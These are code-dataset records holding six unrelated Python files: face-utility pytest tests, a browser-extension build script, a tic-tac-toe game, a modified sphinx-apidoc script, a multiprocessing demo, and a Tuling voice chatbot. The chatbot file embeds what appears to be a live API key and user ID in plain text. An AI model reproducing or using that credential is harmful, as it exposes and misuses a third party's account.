+{"seq_id":"124904831","text":"\"\"\"\nImplement unittest for the utils.py file.\n\"\"\"\nimport pytest\n\nfrom utils import Photo, get_common_face_uids, _get_faces_by_uids, \\\n get_best_face\n\n\n@pytest.fixture\ndef photo1():\n \"\"\"\n Create a photo.\n\n :return: The created photo\n :rtype: Photo\n \"\"\"\n return Photo(None)\n\n\n@pytest.fixture\ndef photo2():\n \"\"\"\n Create a photo.\n\n :return: The created photo.\n :rtype: Photo\n \"\"\"\n return Photo(None)\n\n\n@pytest.fixture\ndef mock_face_api(mocker):\n \"\"\"\n Mock the azure face api.\n\n :type mocker: pytest_mock.MockFixture\n \"\"\"\n mocker.patch('utils.cf.face')\n\n\n@pytest.fixture\ndef photo_multiple_faces(generator, photo1, photo2):\n \"\"\"\n :type photo1: Photo\n :type photo2: Photo\n \"\"\"\n f1 = generator.face(photo=photo1, uid='a')\n f2 = generator.face(photo=photo1, uid='b')\n photo1.uid_to_face = {'a': f1, 'b': f2}\n\n return photo1\n\n\n@pytest.mark.usefixtures(\"mock_face_api\")\nclass TestGetCommonFaceUids:\n \"\"\"\n test get_common_face_uids\n \"\"\"\n def test_no_common_face(self, photo1, photo2):\n \"\"\"\n Make sure that when there is no common face(all the faces\n are different) then the function returns one of them.\n\n :type photo1: Photo\n :type photo2: Photo\n \"\"\"\n result = get_common_face_uids([photo1, photo2])\n assert result is not None\n\n def test_happy_flow(self, generator, photo_multiple_faces, photo2):\n \"\"\"\n Make sure that the function returns the appropriate most common face.\n\n :type generator: tests.data_population.Generator\n :type photo_multiple_faces: Photo\n :type photo2: Photo\n \"\"\"\n generator.face(photo=photo2, uid='c')\n\n faces = get_common_face_uids([photo_multiple_faces, photo2])\n for face in faces:\n assert face.uid in ['a', 'c']\n\n def test_no_faces(self, photo1, photo2):\n \"\"\"\n Make sure that when there are no faces detected in the pictures that\n the function will returned `None`.\n\n :type photo1: Photo\n :type photo2: Photo\n \"\"\"\n assert get_common_face_uids([photo1, photo2]) == []\n\n def test_no_photos(self):\n \"\"\"\n Make sure that when no photos given are input to the function that\n None is returned.\n \"\"\"\n assert get_common_face_uids([]) == []\n\n\nclass TestGetBestFace:\n \"\"\"\n test get_best_face.\n \"\"\"\n def test_no_faces(self):\n \"\"\"\n Make sure that when no faces are given that nothing is returned.\n \"\"\"\n get_best_face([])\n\n def test_equal_best(self, generator):\n \"\"\"\n Test what happens when there are equal best faces - just return\n the first one.\n\n :type generator: Generator\n \"\"\"\n face1, face2 = generator.faces('a', 'b')\n photo = generator.photo(face1, face2)\n face1.size = 100\n face2.size = 100\n photo.size = 1000\n\n result = get_best_face([face1, face2])\n assert result is face1\n\n def test_happy_flow(self, generator):\n \"\"\"\n Make sure the function works in normal flow. 
The face which covers\n the most of the photo should be returned.\n\n :type generator: Generator\n \"\"\"\n face1, face2 = generator.faces('a', 'b')\n photo = generator.photo(face1, face2)\n face1.size = 100\n face2.size = 500\n photo.size = 1000\n\n result = get_best_face([face1, face2])\n assert result is face2\n\n\n@pytest.mark.parametrize(\"generated_uids, required_uids, expected_uids\",\n [\n # happy-flow\n ([\"a\", \"b\", \"c\"], [\"a\", \"b\"], [\"a\", \"b\"]),\n # empty flow\n ([\"a\", \"b\", \"c\"], [], []),\n # invalid call, don't throw an exception\n ([], [\"a\"], [])\n ]\n )\ndef test_get_faces_by_uids(generator, generated_uids, required_uids,\n expected_uids):\n \"\"\"\n Test that the get_faces_by_uids returns the proper Face objects.\n\n :type generator: tests.data_population.Generator\n :param list generated_uids: The IDs of the faces that will be generated.\n :param list required_uids: The IDs that will be required from the\n _get_faces-by_uids function\n :param list expected_uids: The UIDs that will be expected to be returned\n from the function.\n \"\"\"\n faces = generator.faces(*generated_uids)\n uids = required_uids\n\n faces = _get_faces_by_uids(uids, faces)\n\n for face in faces:\n assert face.uid in expected_uids\n","sub_path":"tests/test_utils_mock/test_utils_mock.py","file_name":"test_utils_mock.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
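These tests lean on two pytest features worth noting: fixtures composed by name (`photo_multiple_faces` builds on `photo1`) and pytest-mock's `mocker` fixture, which reverts patches automatically after each test. A minimal, self-contained illustration of the `mocker` half (assumes `pytest` and `pytest-mock` are installed; the patched target here is arbitrary):

```python
import time
import pytest

@pytest.fixture
def frozen_clock(mocker):
    # The patch lasts exactly one test; pytest-mock undoes it on teardown
    return mocker.patch("time.time", return_value=1_000_000.0)

def test_reads_frozen_clock(frozen_clock):
    assert time.time() == 1_000_000.0
    frozen_clock.assert_called_once()
```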
+{"seq_id":"473102624","text":"import os\nimport sys\nfrom distutils.dir_util import copy_tree\nimport shutil\nimport json\n\nfirefox_dev_proj_dir_name = 'firefox_dev'\n\ndef get_version():\n manifest_path = 'temp/manifest.json'\n\n with open(manifest_path, 'r') as f:\n data = json.load(f)\n return data['version'].replace('.', '')\n\ndef replace_strings_for_edge():\n background_path = 'temp/main/background.js'\n\n with open(background_path, 'r') as f:\n data = f.read()\n data = data.replace('''tpga_browser = 'chrome';''', '''tpga_browser = 'edge';''')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/reviews/', 'https://microsoftedge.microsoft.com/addons/detail/twitch-previews/nmekhdckniaiegiekejhmcmddplmliel')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/', 'https://microsoftedge.microsoft.com/addons/detail/twitch-previews/nmekhdckniaiegiekejhmcmddplmliel')\n\n with open(background_path, 'w') as f:\n f.write(data)\n\ndef replace_strings_for_opera():\n background_path = 'temp/main/background.js'\n\n with open(background_path, 'r') as f:\n data = f.read()\n data = data.replace('''tpga_browser = 'chrome';''', '''tpga_browser = 'opera';''')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/reviews/', 'https://addons.opera.com/en/extensions/details/twitch-previews/')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/', 'https://addons.opera.com/en/extensions/details/twitch-previews/')\n\n with open(background_path, 'w') as f:\n f.write(data)\n\n\ndef replace_strings_for_firefox(f_dir):\n manifest_path = f_dir + '/manifest.json'\n background_path = f_dir + '/main/background.js'\n\n with open(manifest_path, 'r') as f:\n data = f.read()\n data = data.replace(''',\"content_security_policy\": \"script-src 'self' https://www.google-analytics.com; object-src 'self'\"''', '')\n\n with open(manifest_path, 'w') as f:\n f.write(data)\n\n with open(background_path, 'r') as f:\n data = f.read()\n data = data.replace('''(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\\n''' \\\n ''' (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\\n''' \\\n ''' m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\\n''' \\\n '''})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');\\n''' \\\n '''ga('create', 'UA-134155755-2', 'auto');\\n''' \\\n '''ga('set', 'checkProtocolTask', null);\\n''' \\\n '''ga('send', 'pageview', 'main');''', '') \\\n\n data = data.replace('''ga('send', 'event', category, action, value);''', '')\n data = data.replace('''tpga_browser = 'chrome';''', '''tpga_browser = 'firefox';''')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/reviews/', 'https://addons.mozilla.org/en-US/firefox/addon/twitchpreviews/')\n data = data.replace('https://chrome.google.com/webstore/detail/twitch-previews/hpmbiinljekjjcjgijnlbmgcmoonclah/', 'https://addons.mozilla.org/en-US/firefox/addon/twitchpreviews/')\n\n with open(background_path, 'w') as f:\n f.write(data)\n\n\ndef make_firefox_dev_proj():\n if os.path.isdir(firefox_dev_proj_dir_name):\n shutil.rmtree(firefox_dev_proj_dir_name)\n os.mkdir(firefox_dev_proj_dir_name)\n copy_tree('../Twitch-Previews', firefox_dev_proj_dir_name)\n 
replace_strings_for_firefox(firefox_dev_proj_dir_name)\n\n\ndef build(browser):\n os.mkdir('temp')\n copy_tree('../Twitch-Previews', 'temp')\n\n if browser == 'chrome':\n pass\n elif browser == 'firefox':\n if os.path.isdir(firefox_dev_proj_dir_name):\n shutil.rmtree(firefox_dev_proj_dir_name)\n replace_strings_for_firefox('temp')\n elif browser == 'opera':\n replace_strings_for_opera()\n elif browser == 'edge':\n replace_strings_for_edge()\n\n output_filename = 'TwitchPreviewsV' + get_version() + '-' + browser\n shutil.make_archive(output_filename, 'zip', 'temp')\n shutil.rmtree('temp')\n\n\nif len(sys.argv) > 1:\n if sys.argv[1] == firefox_dev_proj_dir_name:\n make_firefox_dev_proj()\n else:\n build(sys.argv[1])\n","sub_path":"build/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
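Each `replace_strings_for_*` function in the record above repeats the same read/replace-several/write cycle with different literals. If the script grows more browser targets, the edits can be declared as data and applied by a single helper (a hypothetical refactor):

```python
def apply_replacements(path, replacements):
    """Apply an old -> new string mapping to a text file in place."""
    with open(path, "r", encoding="utf-8") as f:
        data = f.read()
    for old, new in replacements.items():
        data = data.replace(old, new)
    with open(path, "w", encoding="utf-8") as f:
        f.write(data)


EDGE_EDITS = {
    "tpga_browser = 'chrome';": "tpga_browser = 'edge';",
    # ...the store-URL swaps would follow the same pattern
}
# apply_replacements('temp/main/background.js', EDGE_EDITS)
```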
+{"seq_id":"348456655","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n File name: solution.py\n Author: Alexander Popp\n Date created: 5/17/2018\n Date last modified: 8/3/2018\n Python version: 3.6.5\n Description:\n Problem #27: Tic Tac Toe Draw from http://www.practicepython.org\n For detailed description of the problem see the accompanying\n file named 'problem.txt' or refer to the aformentioned website.\n\"\"\"\n\n\n# Create a game class\nclass Game:\n def __init__(self):\n self.board = [[0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]]\n self.players = [\"X\", \"O\"]\n self.empty = 9\n self.active_player = 0\n\t\t\n def place_move(self, row, column):\n if self.board[row - 1][column - 1] != 0:\n print(\"That position has already been played!\")\n else:\n self.board[row - 1][column - 1] = self.players[self.active_player]\n self.empty -= 1\n self.change_active_player()\n\t\t\n def check_moves(self):\n if self.empty == 0:\n return False\n return True\n\n def print_game(self):\n for row in self.board:\n print(row)\n\n def change_active_player(self):\n if self.active_player == 0:\n self.active_player = 1\n else:\n self.active_player = 0\n\n # Get player input\n def get_input(self):\n while True:\n try:\n player_input = input(\"[Player {}] Enter coordinates: (row, column) \".format(self.active_player + 1)).split(\",\")\n if len(player_input) == 2:\n position = [int(player_input[0]), int(player_input[1])]\n break\n else:\n print(\"Input not recognised.\\nPlease try again...\")\n except ValueError:\n print(\"Input not recognised.\\nPlease try again...\")\n return position\n\n def run_game(self):\n self.print_game()\n player_input = self.get_input()\n self.place_move(player_input[0], player_input[1])\n\n\n# Main function\ndef main():\n game = Game()\n while game.check_moves():\n game.run_game()\n game.print_game()\n print(\"Out of moves. GAME OVER!\")\n\n\n# Run program\nif __name__ == \"__main__\":\n main()\n","sub_path":"27-Tic_tac_toe_draw/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"90189557","text":"# -*- coding: utf-8 -*-\n\"\"\"\n sphinx.apidoc\n ~~~~~~~~~~~~~\n\n Parses a directory tree looking for Python modules and packages and creates\n ReST files appropriately to create code documentation with Sphinx. It also\n creates a modules index (named modules.).\n\n This is derived from the \"sphinx-autopackage\" script, which is:\n Copyright 2008 Société des arts technologiques (SAT),\n http://www.sat.qc.ca/\n\n :copyright: Copyright 2007-2014 by the Sphinx team, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\"\"\"\nfrom __future__ import print_function\n\nimport os\nimport string\nimport sys\nimport optparse\nimport traceback as tb\nfrom os.path import join\n\nfrom sphinx.util.osutil import walk\nfrom sphinx import __version__\n\n# automodule options\nif 'SPHINX_APIDOC_OPTIONS' in os.environ:\n OPTIONS = os.environ['SPHINX_APIDOC_OPTIONS'].split(',')\nelse:\n OPTIONS = [\n 'members',\n 'undoc-members',\n # 'inherited-members', # disabled because there's a bug in sphinx\n 'show-inheritance',\n ]\n\nINITPY = '__init__.py'\nPY_SUFFIXES = set(['.py', '.pyx'])\n\n\ndef makename(package, module):\n \"\"\"Join package and module with a dot.\"\"\"\n # Both package and module can be None/empty.\n if package:\n name = package\n if module:\n name += '.' + module\n else:\n name = module\n return name\n\n\ndef wrapped_print(msg, opts):\n if not opts.quiet:\n print(msg)\n\n\ndef write_file(name, text, opts):\n \"\"\"Write the output file for module/package .\"\"\"\n fname = join(opts.destdir, '%s.%s' % (name, opts.suffix))\n if opts.dryrun:\n wrapped_print('Would create file %s.' % fname, opts)\n return\n if not opts.force and os.path.isfile(fname):\n wrapped_print('File %s already exists, skipping.' % fname, opts)\n else:\n wrapped_print('Creating file %s.' % fname, opts)\n f = open(fname, 'w')\n try:\n f.write(text)\n finally:\n f.close()\n\n\ndef format_heading(level, text):\n \"\"\"Create a heading of [1, 2 or 3 supported].\"\"\"\n underlining = ['=', '-', '~', ][level - 1] * len(text)\n return '%s\\n%s\\n\\n' % (text, underlining)\n\n\ndef format_directive(module, package=None):\n \"\"\"Create the automodule directive and add the options.\"\"\"\n directive = '.. automodule:: %s\\n' % makename(package, module)\n for option in OPTIONS:\n directive += ' :%s:\\n' % option\n return directive\n\n\ndef create_module_file(package, module, opts):\n \"\"\"Build the text of the file and write the file.\"\"\"\n if not opts.noheadings:\n text = format_heading(1, '%s module' % module)\n else:\n text = ''\n #text += format_heading(2, ':mod:`%s` Module' % module)\n text += format_directive(module, package)\n write_file(makename(package, module), text, opts)\n\n\ndef create_package_file(master_package, subroot, submods, opts, subs):\n \"\"\"Build the text of the file and write the file.\"\"\"\n text = format_heading(1, '%s package' % makename(master_package, subroot))\n\n if opts.modulefirst:\n text += format_directive(subroot, master_package)\n text += '\\n'\n\n # if there are some package directories, add a TOC for theses subpackages\n if subs:\n text += format_heading(2, 'Subpackages')\n text += '.. toctree::\\n\\n'\n for sub in subs:\n text += ' %s.%s\\n' % (makename(master_package, subroot), sub)\n text += '\\n'\n\n if submods:\n text += format_heading(2, 'Submodules')\n if opts.separatemodules:\n text += '.. 
toctree::\\n\\n'\n for submod in submods:\n modfile = makename(master_package, makename(subroot, submod))\n text += ' %s\\n' % modfile\n\n # generate separate file for this module\n if not opts.noheadings:\n filetext = format_heading(1, '%s module' % modfile)\n else:\n filetext = ''\n filetext += format_directive(makename(subroot, submod),\n master_package)\n write_file(modfile, filetext, opts)\n else:\n for submod in submods:\n modfile = makename(master_package, makename(subroot, submod))\n if not opts.noheadings:\n text += format_heading(2, '%s module' % modfile)\n text += format_directive(makename(subroot, submod),\n master_package)\n text += '\\n'\n text += '\\n'\n\n if not opts.modulefirst:\n text += format_heading(2, 'Module contents')\n text += format_directive(subroot, master_package)\n\n write_file(makename(master_package, subroot), text, opts)\n\n\ndef create_modules_toc_file(modules, opts, name='modules'):\n \"\"\"Create the module's index.\"\"\"\n text = format_heading(1, '%s' % opts.header)\n text += '.. toctree::\\n'\n text += ' :maxdepth: %s\\n\\n' % opts.maxdepth\n\n modules.sort()\n prev_module = ''\n for module in modules:\n # look if the module is a subpackage and, if yes, ignore it\n if module.startswith(prev_module + '.'):\n continue\n prev_module = module\n text += ' %s\\n' % module\n\n write_file(name, text, opts)\n\n\ndef walk_dir_tree(rootpath, excludes, opts):\n \"\"\" Walk the directory tree and create the corresponding ReST files as \n dictated by the options.\n \"\"\"\n toplevels = []\n if has_initpy(rootpath):\n root_package = rootpath.split(os.sep)[-1]\n else:\n # Generate .rst files for the top level modules even if we are \n # not in a package (this is a one time exception)\n root_package = None\n mods = get_modules(os.listdir(rootpath), excludes, opts, rootpath)\n for module in mods:\n create_module_file(root_package, module, opts)\n toplevels.append(module)\n # Do the actual directory tree walk\n pkgname_mods_subpkgs = pkgname_modules_subpkgs(rootpath, excludes, opts)\n for pkgname, mods, subpkgs in pkgname_mods_subpkgs:\n create_package_file(root_package, pkgname, mods, opts, subpkgs)\n toplevels.append(makename(root_package, pkgname))\n\n return toplevels\n\n\ndef has_initpy(directory):\n return os.path.isfile( join(directory, INITPY) )\n\n\ndef pkgname_modules_subpkgs(rootpath, excluded, opts):\n \"\"\"A generator that filters out the packages and modules as desired and \n yields tuples of (package name, modules, subpackages). \n \"\"\"\n for root, dirs, files in walk(rootpath, followlinks=opts.followlinks):\n if root in excluded:\n del dirs[:] # skip all subdirectories as well\n continue\n if INITPY not in files:\n if root != rootpath:\n del dirs[:]\n continue\n pkg_name = root[len(rootpath):].lstrip(os.sep).replace(os.sep, '.')\n if not opts.includeprivate and pkg_name.startswith('_'):\n del dirs[:]\n continue\n modules = get_modules(files, excluded, opts, root)\n subpkgs = get_subpkgs(dirs, excluded, opts, root, rootpath)\n dirs[:] = subpkgs # visit only subpackages\n has_sg_to_doc = True \n if opts.respect_all:\n all_attr, has_docstr = get_all_attr_has_docstr(rootpath, root, opts)\n has_sg_to_doc = has_docstr or bool(all_attr)\n # has_sg_to_doc: e.g. multiprocessing.dummy has nonempty __all__ but \n # no modules, subpkgs or docstring to document -> still document it! 
\n modules = get_only_modules(all_attr, modules)\n if modules or subpkgs or has_sg_to_doc:\n yield pkg_name, modules, subpkgs\n\n\ndef get_modules(files, excluded, opts, root):\n \"\"\"Filter out and sort the considered python modules from files.\"\"\"\n return sorted( os.path.splitext(f)[0] for f in files\n if os.path.splitext(f)[1] in PY_SUFFIXES and\n norm_path(root, f) not in excluded and\n f != INITPY and\n (not f.startswith('_') or opts.includeprivate) )\n\n\ndef get_subpkgs(dirs, excluded, opts, root, rootpath):\n \"\"\"Filter out and sort the considered subpackages from dirs.\"\"\" \n exclude_prefixes = ('.',) if opts.includeprivate else ('.', '_')\n return sorted( d for d in dirs \n if not d.startswith(exclude_prefixes) and\n norm_path(root, d) not in excluded and\n has_initpy( join(root, d) ) and \n pkg_to_doc(opts, root, d, rootpath) )\n\n\ndef pkg_to_doc(opts, root, d, rootpath):\n if not opts.respect_all:\n return True\n all_attr, has_docstr = get_all_attr_has_docstr(rootpath, join(root,d), opts)\n return all_attr is None or bool(all_attr) or has_docstr \n\n\ndef get_only_modules(all_attr, modules):\n \"\"\"If ``__all__`` is not present in ``__init__.py``, we take all the modules\n in the current directory. Otherwise, we only keep those element of \n ``__all__`` that are also modules in the current directory.\"\"\"\n if all_attr is None:\n return modules\n mods = set(modules)\n return [m for m in all_attr if m in mods]\n\n\ndef get_all_attr_has_docstr(rootpath, path, opts, cached={}):\n \"\"\"Returns a tuple: the ``__all__`` attribute of the package as a list \n (``None`` if ``__all__`` is not present) and a ``bool`` indicating whether\n the module has a doc string. Calls ``sys.exit`` on failure \n (e.g. ``ImportError``), unless the --ignore-errors flag is used. Returns \n ``(None, False)`` on ignored error. A simple-minded caching is used as we \n look at each package twice.\n \"\"\"\n if path in cached:\n return cached[path]\n \n try:\n path_before = list(sys.path)\n modules_before = set(sys.modules)\n head, pkg = find_top_package(rootpath, path)\n sys.path.append(head) # Prepend or append?\n __import__(pkg) # for Python 2.6 compatibility\n module = sys.modules[pkg]\n all_attrib = get_all_from(module)\n # cairo and zope has __doc__ but it is None\n has_docstring = getattr(module, '__doc__', None) is not None\n cached[path] = (all_attrib, has_docstring)\n return cached[path]\n except AssertionError:\n raise \n except:\n print('\\n', tb.format_exc().rstrip(), file=sys.stderr) \n print('Please make sure that the package \\'%s\\' can be imported (or use'\n ' --ignore-errors\\nor exclude %s).' 
% (pkg,path), file=sys.stderr)\n if not opts.ignore_errors:\n sys.exit(1)\n finally:\n difference = sys.modules.viewkeys() - modules_before \n for k in difference:\n sys.modules.pop(k)\n sys.path = path_before\n # We only get here if there was an ignored error, for example on ImportError\n cached[path] = (None, False) \n return cached[path] \n\n\ndef find_top_package(root, path):\n \"\"\"Walks up in the directory hierarchy to find the top level package or \n until hitting the root.\n \"\"\"\n # For example with:\n # root = '/usr/lib/python2.7'\n # path = '/usr/lib/python2.7/dist-packages/scipy/sparse/linalg/isolve' \n # result: '/usr/lib/python2.7/dist-packages', 'scipy.sparse.linalg.isolve'\n assert path.startswith(root), '\\n%s\\n%s' % (root, path)\n assert has_initpy(path), path\n roothead = os.path.dirname(root)\n head, tail = os.path.split(path)\n while roothead != head and has_initpy(head): \n head, pkg = os.path.split(head)\n tail = join(pkg, tail)\n return head, string.replace(tail, os.sep, '.')\n\n\ndef get_all_from(module):\n all_attr = getattr(module, '__all__', None)\n # Some packages (for example dbus.mainloop.__init__.py) uses a tuple.\n # Convert __all__ to list if necessary. \n if all_attr is not None and not isinstance(all_attr, list):\n all_attr = list(all_attr) \n return all_attr\n\n\ndef norm_path(root, mod_or_dir):\n return os.path.normpath( join(root, mod_or_dir) )\n\n\ndef main(argv=sys.argv):\n \"\"\"Parse and check the command line arguments.\"\"\"\n parser = optparse.OptionParser(\n usage=\"\"\"\\\nusage: %prog [options] -o <output_path> <module_path> [exclude_path, ...]\n\nLook recursively in <module_path> for Python modules and packages and create\none reST file with automodule directives per package in the <output_path>.\n\nThe <exclude_path>s can be files and/or directories that will be excluded\nfrom generation.\n\nNote: By default this script will not overwrite already created files.\"\"\")\n\n parser.add_option('-o', '--output-dir', action='store', dest='destdir',\n help='Directory to place all output', default='')\n parser.add_option('-d', '--maxdepth', action='store', dest='maxdepth',\n help='Maximum depth of submodules to show in the TOC '\n '(default: 4)', type='int', default=4)\n parser.add_option('-f', '--force', action='store_true', dest='force',\n help='Overwrite existing files')\n parser.add_option('-l', '--follow-links', action='store_true',\n dest='followlinks', default=False,\n help='Follow symbolic links. Powerful when combined '\n 'with collective.recipe.omelette.')\n parser.add_option('-n', '--dry-run', action='store_true', dest='dryrun',\n help='Run the script without creating files')\n parser.add_option('-e', '--separate', action='store_true',\n dest='separatemodules',\n help='Put documentation for each module on its own page')\n parser.add_option('-P', '--private', action='store_true',\n dest='includeprivate',\n help='Include \"_private\" modules')\n parser.add_option('-T', '--no-toc', action='store_true', dest='notoc',\n help='Don\'t create a table of contents file')\n parser.add_option('-E', '--no-headings', action='store_true',\n dest='noheadings',\n help='Don\'t create headings for the module/package '\n 'packages (e.g. 
when the docstrings already contain '\n 'them)')\n parser.add_option('-M', '--module-first', action='store_true',\n dest='modulefirst',\n help='Put module documentation before submodule '\n 'documentation')\n parser.add_option('-s', '--suffix', action='store', dest='suffix',\n help='file suffix (default: rst)', default='rst')\n parser.add_option('-F', '--full', action='store_true', dest='full',\n help='Generate a full project with sphinx-quickstart')\n parser.add_option('-H', '--doc-project', action='store', dest='header',\n help='Project name (default: root module name)')\n parser.add_option('-A', '--doc-author', action='store', dest='author',\n type='str',\n help='Project author(s), used when --full is given')\n parser.add_option('-V', '--doc-version', action='store', dest='version',\n help='Project version, used when --full is given')\n parser.add_option('-R', '--doc-release', action='store', dest='release',\n help='Project release, used when --full is given, '\n 'defaults to --doc-version')\n parser.add_option('--version', action='store_true', dest='show_version',\n help='Show version information and exit')\n parser.add_option('--respect-all', action='store_true',\n dest='respect_all',\n help='Respect __all__ when looking for modules')\n parser.add_option('--quiet', action='store_true',\n dest='quiet',\n help='Do not show which files are created or skipped')\n parser.add_option('--ignore-errors', action='store_true',\n dest='ignore_errors', \n help='Ignore import errors and continue')\n (opts, args) = parser.parse_args(argv[1:])\n\n if opts.show_version:\n print('Sphinx (sphinx-apidoc) %s' % __version__)\n return 0\n\n if not args:\n parser.error('A package path is required.')\n\n rootpath, excludes = args[0], args[1:]\n if not opts.destdir:\n parser.error('An output directory is required.')\n if opts.header is None:\n opts.header = os.path.normpath(rootpath).split(os.sep)[-1]\n if opts.suffix.startswith('.'):\n opts.suffix = opts.suffix[1:]\n if not os.path.isdir(rootpath):\n print('%s is not a directory.' % rootpath, file=sys.stderr)\n sys.exit(1)\n if opts.includeprivate and opts.respect_all:\n msg = 'Either --private or --respect-all but not both'\n print(msg, file=sys.stderr)\n sys.exit(1)\n if opts.ignore_errors and not opts.respect_all:\n msg = 'The --ignore-errors flag is only meaningful with --respect-all'\n print(msg, file=sys.stderr)\n sys.exit(1)\n if not os.path.isdir(opts.destdir):\n if not opts.dryrun:\n os.makedirs(opts.destdir)\n rootpath = os.path.normpath(os.path.abspath(rootpath))\n excludes = { os.path.normpath(os.path.abspath(excl)) for excl in excludes }\n modules = walk_dir_tree(rootpath, excludes, opts)\n if opts.full:\n modules.sort()\n prev_module = ''\n text = ''\n for module in modules:\n if module.startswith(prev_module + '.'):\n continue\n prev_module = module\n text += ' %s\\n' % module\n d = dict(\n path = opts.destdir,\n sep = False,\n dot = '_',\n project = opts.header,\n author = opts.author or 'Author',\n version = opts.version or '',\n release = opts.release or opts.version or '',\n suffix = '.' 
+ opts.suffix,\n master = 'index',\n epub = True,\n ext_autodoc = True,\n ext_viewcode = True,\n makefile = True,\n batchfile = True,\n mastertocmaxdepth = opts.maxdepth,\n mastertoctree = text,\n )\n if not opts.dryrun:\n from sphinx import quickstart as qs\n qs.generate(d, silent=True, overwrite=opts.force)\n elif not opts.notoc:\n create_modules_toc_file(modules, opts)\n\nif __name__ == '__main__':\n main()\n","sub_path":"hacked.py","file_name":"hacked.py","file_ext":"py","file_size_in_byte":18605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
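+For context, a sketch of driving the sphinx-apidoc variant above programmatically rather than from a shell; the module name ("mypackage") and output directory ("docs/api") are placeholders, and the script itself is Python 2 only (it relies on optparse, dict.viewkeys() and string.replace()):
+
+# Assumes the file above is saved as hacked.py next to this driver.
+# Equivalent shell call: python2 hacked.py --respect-all -o docs/api mypackage
+from hacked import main
+
+main(['hacked.py', '--respect-all', '-o', 'docs/api', 'mypackage'])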
+{"seq_id":"277291756","text":"# 图灵已经限制次数了\r\n# 使用我刚更新的机器人\r\nfrom time import sleep\r\nfrom socket import setdefaulttimeout\r\nfrom re import sub\r\nfrom urllib import request\r\nfrom json import dumps\r\nfrom speech import say\r\nimport AudioTest # 自定义模块\r\n\r\n# 接口地址 http://openapi.tuling123.com/openapi/api/v2\r\nprint(\"[INFO] 模块加载完成\")\r\ndef sendMessage(text):\r\n\tdata0={\r\n\t\t\"reqType\":\"0\",\r\n\t\t\"perception\": {\r\n\t\t\t\"inputText\": {\r\n\t\t\t\t\"text\": \"附近的酒店\"\r\n\t\t\t},\r\n\t\t\t\"selfInfo\": {\r\n\t\t\t\t\"location\": {\r\n\t\t\t\t\t\"city\": \"北京\",\r\n\t\t\t\t\t\"province\": \"北京\",\r\n\t\t\t\t\t\"street\": \"信息路\"\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t},\r\n\t\t\"userInfo\": {\r\n\t\t\t\"apiKey\": \"038aed41be7b451daac8d74340b9e0fd\",\r\n\t\t\t\"userId\": \"316470\"\r\n\t\t}\r\n\t}\r\n\tdata0[\"perception\"][\"inputText\"][\"text\"]=text\r\n\turl_api=\"http://openapi.tuling123.com/openapi/api/v2\"\r\n\ttimeout = 5\r\n\tsetdefaulttimeout(timeout)\r\n\treq = request.Request(url_api,data=dumps(data0).encode(\"utf-8\"))\r\n\treq.add_header('Content-Type','application/json')\r\n\tresponse=request.urlopen(req)\r\n\toutjson=str(response.read(),encoding=\"utf-8\")\r\n\t# print(\"[INFO] 服务器数据\\n\",outjson+\"\\n[/INFO]\")\r\n\tout_str=sub(r\".+value\",\"\",outjson)\r\n\tout_str=sub(r'\"}}]}',\"\",out_str)\r\n\tout_str=out_str[12:] \r\n\treturn out_str\r\n\r\nwhile 1:\r\n\ttry:\r\n\t\tinp=AudioTest.MainMethod(10)['result'][0]\r\n\t\tprint('主人:',inp)\r\n\t\tbackdio=sendMessage(inp)\r\n\t\tprint(\"图灵机器人:\",backdio)\r\n\t\tsay(backdio)\r\n\texcept:\r\n\t\ttry:\r\n\t\t\tbackdio=sendMessage(\" \")\r\n\t\t\tprint(\"图灵机器人:\",backdio)\r\n\t\t\tsay(backdio)\r\n\t\texcept:\r\n\t\t\tprint(\"请求出错!!\")\r\n","sub_path":"Robot/智能聊天.py","file_name":"智能聊天.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"629064462","text":"#encoding: utf-8\n#!/usr/local/bin python3\n\nfrom multiprocessing import Process\nfrom time import sleep\n\ndef run(num):\n print(\"子进程启动\")\n sleep(2)\n print(\"子进程结束\")\n\nif __name__ == \"__main__\":\n print(\"父进程���动\")\n p=Process(target=run,args=(\"1\",))\n p.start()\n #父进程要等待子进程结束后才继续执行,需要使用join()\n #通常用于进程间的同步\n p.join()\n\n print(\"父进程结束\")","sub_path":"more_task2.py","file_name":"more_task2.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
